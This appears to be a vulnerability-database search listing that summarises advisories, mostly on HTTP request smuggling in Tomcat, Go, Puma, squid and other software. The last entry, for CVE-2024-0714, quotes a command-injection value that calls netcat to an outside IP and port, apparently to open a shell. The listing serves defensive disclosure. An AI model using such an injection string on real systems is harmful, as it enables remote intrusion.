16591 matches found

IBM Security Bulletins
added 2024/01/25 1:44 p.m., 20 views

Security Bulletin: IBM Storage Ceph is vulnerable to an HTTP Request Smuggling vulnerability in Golang (CVE-2022-1705)

Summary: Golang is used by IBM Storage Ceph as part of RGW and in assorted other locations. CVE-2022-1705 Vulnerability Details: CVEID: CVE-2022-1705 DESCRIPTION: Golang Go is vulnerable to HTTP request smuggling, caused by a flaw with accepting of some invalid Transfer-Encoding headers in the HTTP/...

CVSS 6.5 | AI score 6.9 | EPSS 0.01113
Exploits 1 | Affected Software 1
OpenVAS
added 2024/01/25 12:00 a.m., 15 views

SUSE: Security Advisory (SUSE-SU-2024:0206-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

CVSS 7.5 | AI score 8 | EPSS 0.02651
Exploits 0 | References 4
Tenable Nessus
added 2024/01/25 12:00 a.m., 35 views

Ubuntu 23.04 / 23.10 : Puma vulnerability (USN-6597-1)

The remote Ubuntu 23.04 / 23.10 host has a package installed that is affected by a vulnerability as referenced in the USN-6597-1 advisory. It was discovered that Puma incorrectly handled parsing chunked transfer encoding bodies. A remote attacker could possibly use this issue to cause Puma to...

CVSS 7.5 | AI score 6.2 | EPSS 0.00958
Exploits 0 | References 2
OpenVAS
added 2024/01/25 12:00 a.m., 17 views

SUSE: Security Advisory (SUSE-SU-2024:0209-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

CVSS 7.5 | AI score 8 | EPSS 0.02651
Exploits 0 | References 4
Github Security Blog
added 2024/01/24 8:20 p.m., 25 views

Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') in trillium-http and trillium-client

Summary: Insufficient validation of outbound header values may lead to request splitting or response splitting attacks in scenarios where attackers have sufficient control over outbound headers. Details: Outbound trillium_http::HeaderValue and trillium_http::HeaderName can be constructed infallibly a...

CVSS 8.1 | AI score 6.8 | EPSS 0.00632
Exploits 0 | References 7 | Affected Software 2
Cvelist
added 2024/01/24 7:38 p.m., 33 views

CVE-2024-23644 trillium-http and trillium-client vulnerable to HTTP Request/Response Splitting

Trillium is a composable toolkit for building internet applications with async rust. In trillium-http prior to 0.3.12 and trillium-client prior to 0.5.4, insufficient validation of outbound header values may lead to request splitting or response splitting attacks in scenarios where attackers have...

CVSS 6.8 | AI score 8.4 | EPSS 0.00632
Exploits 0 | References 3
Akamai Blog
added 2024/01/24 2:00 p.m., 29 views

Integrating mPulse’s Beacon API with EdgeWorkers to Visualize All Client Requests

Akamai mPulse combines with Akamai EdgeWorkers to visualize any client request and uses its http-request module to let users send their own requests...

AI score 7
Exploits 0
OSV
added 2024/01/24 12:55 p.m., 3 views

SUSE-SU-2024:0209-1 Security update for tomcat

This update for tomcat fixes the following issues:
Security fixes:
- CVE-2023-46589: Fixed HTTP request smuggling due to incorrect headers parsing (bsc#1217649).
Other fixes:
- Streamline how patches are handled in the spec file of the package...

CVSS 7.5 | AI score 7.4 | EPSS 0.02651
Exploits 0 | References 3
OSV
added 2024/01/24 12:54 p.m., 5 views

SUSE-SU-2024:0208-1 Security update for tomcat10

This update for tomcat10 fixes the following issues:
Updated to Tomcat 10.1.18
- CVE-2023-46589: Fixed HTTP request smuggling due to incorrect headers parsing (bsc#1217649).
Find the full release notes at: https://tomcat.apache.org/tomcat-9.0-doc/changelog.html...

CVSS 7.5 | AI score 7.5 | EPSS 0.02651
Exploits 0 | References 3
OSV
added 2024/01/24 12:54 p.m., 7 views

SUSE-SU-2024:0206-1 Security update for tomcat

This update for tomcat fixes the following issues:
Security fixes:
- CVE-2023-46589: Fixed HTTP request smuggling due to incorrect headers parsing (bsc#1217649).
Other fixes:
- Streamline how patches are handled in the spec file of the package...

CVSS 7.5 | AI score 7.4 | EPSS 0.02651
Exploits 0 | References 3
RedHat Linux
added 2024/01/24 12:28 p.m., 45 views

Important: Red Hat Security Advisory: squid:4 security update

An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is...

CVSS 9.8 | AI score 7.4 | EPSS 0.88818
Exploits 1 | References 7
Tenable Nessus
added 2024/01/24 12:00 a.m., 29 views

Amazon Linux 2 : containerd, --advisory ALAS2DOCKER-2024-035 (ALASDOCKER-2024-035)

The version of containerd installed on the remote host is prior to 1.7.2-1. It is, therefore, affected by a vulnerability as referenced in the ALAS2DOCKER-2024-035 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version numbe...

AI score 5.6
Exploits 0 | References 2
Tenable Nessus
added 2024/01/24 12:00 a.m., 28 views

GLSA-202401-27 : Ruby: Multiple vulnerabilities

The remote host is affected by the vulnerability described in GLSA-202401-27 Ruby: Multiple vulnerabilities - An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header...

CVSS 9.8 | AI score 8.1 | EPSS 0.04766
Exploits 6 | References 18
NVD
added 2024/01/22 1:15 p.m., 30 views

CVE-2024-22233

In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition. Specifically, an application is vulnerable when all of the following are true: the application uses Spring MVC Spring Security 6.1....

CVSS 7.5 | AI score 7.5 | EPSS 0.01048
Exploits 0 | References 2
Debian CVE
added 2024/01/22 12:16 p.m., 32 views

CVE-2024-22233

In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition. Specifically, an application is vulnerable when all of the following are true: the application uses Spring MVC Spring Security 6.1....

CVSS 7.5 | AI score 7.4 | EPSS 0.01048
Exploits 0
Amazon
added 2024/01/22 12:00 a.m., 56 views

Important: amazon-cloudwatch-agent

Issue Overview: The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. (CVE-2023-39325) A malicious HTTP sender can use chunk extensions to cause a receiver...

CVSS 7.5 | AI score 7.9 | EPSS 0.03796
Exploits 0
GitLab Advisory Database
added 2024/01/22 12:00 a.m., 18 views

Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')

chasquid before 1.13 allows SMTP smuggling because LF-terminated lines are accepted...

CVSS 7.5 | AI score 7.1 | EPSS 0.00468
Exploits 0 | References 2 | Affected Software 1
BDU FSTEC
added 2024/01/22 12:00 a.m., 4 views

A vulnerability in the NEXO-OS operating system of the Bosch Nexo cordless nutrunner and Bosch Nexo special cordless nutrunner tools, used for installation work on production lines, allows an attacker to upload arbitrary files.

The vulnerability in the NEXO-OS operating system for tools used in production line assembly work, such as the Bosch Nexo cordless nutrunner and the Bosch Nexo special cordless nutrunner, is caused by improper limitation of a path name to a restricted directory. Exploiting this...

CVSS 6.8 | AI score 6.7 | EPSS 0.00778
Exploits 0 | References 3 | Affected Software 1
Hacker One
added 2024/01/19 6:09 p.m., 178 views

Internet Bug Bounty: CVE-2024-21733 Apache Tomcat HTTP Request Smuggling (Client-Side Desync) (CWE: 444)

SECURITY: CVE-2024-21733 Apache Tomcat - Information Disclosure. Severity: Important. Vendor: The Apache Software Foundation. Versions Affected: Apache Tomcat 9.0.0-M11 to 9.0.43, Apache Tomcat 8.5.7 to 8.5.63. Description: Incomplete POST requests triggered an error response that could contain data fr...

CVSS 5.3 | AI score 5.8 | EPSS 0.14286
Exploits 3
NVD
added 2024/01/19 3:15 p.m., 16 views

CVE-2024-0714

A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 ...

CVSS 9.8 | AI score 7.5 | EPSS 0.01616
Exploits 0 | References 2